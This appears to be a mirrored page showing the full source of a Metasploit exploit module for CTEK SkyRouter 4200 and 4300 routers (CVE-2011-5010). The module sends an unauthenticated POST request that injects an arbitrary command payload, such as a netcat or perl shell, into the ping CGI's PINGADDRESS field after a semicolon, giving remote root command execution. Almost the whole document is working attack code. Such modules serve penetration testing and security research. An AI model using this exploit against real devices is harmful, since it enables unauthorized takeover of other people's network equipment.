Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/unix/http/ctek_skyrouter.rb
19669 views
1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5
6
class MetasploitModule < Msf::Exploit::Remote
7
Rank = AverageRanking
8
9
include Msf::Exploit::Remote::Tcp
10
include Msf::Exploit::Remote::HttpClient
11
12
def initialize(info = {})
13
super(
14
update_info(
15
info,
16
'Name' => 'CTEK SkyRouter 4200 and 4300 Command Execution',
17
'Description' => %q{
18
This module exploits an unauthenticated remote root exploit within ctek SkyRouter 4200 and 4300.
19
},
20
'Author' => [ 'savant42' ], # with module help from kos
21
'License' => MSF_LICENSE,
22
'References' => [
23
['CVE', '2011-5010'],
24
['OSVDB', '77497']
25
],
26
'Privileged' => false,
27
'Payload' => {
28
'DisableNops' => true,
29
'Space' => 1024,
30
'Compat' =>
31
{
32
'PayloadType' => 'cmd',
33
'RequiredCmd' => 'generic perl telnet netcat netcat-e',
34
}
35
},
36
'Platform' => 'unix',
37
'Arch' => ARCH_CMD,
38
'Targets' => [[ 'Automatic', {}]],
39
'DisclosureDate' => '2011-09-08', # CGI historical date :)
40
'DefaultTarget' => 0,
41
'Notes' => {
42
'Reliability' => UNKNOWN_RELIABILITY,
43
'Stability' => UNKNOWN_STABILITY,
44
'SideEffects' => UNKNOWN_SIDE_EFFECTS
45
}
46
)
47
)
48
end
49
50
def exploit
51
post_data = "MYLINK=%2Fapps%2Fa3%2Fcfg_ethping.cgi&CMD=u&PINGADDRESS=;" + Rex::Text.uri_encode(payload.encoded) + "+%26"
52
uri = '/apps/a3/cfg_ethping.cgi'
53
print_status("Sending HTTP request for #{uri}")
54
res = send_request_cgi({
55
'global' => true,
56
'uri' => uri,
57
'method' => "POST",
58
'data' => post_data
59
}, 30)
60
61
if res
62
print_status("The server responded with HTTP CODE #{res.code}")
63
else
64
print_status("The server did not respond to our request")
65
end
66
67
handler
68
end
69
end
70
71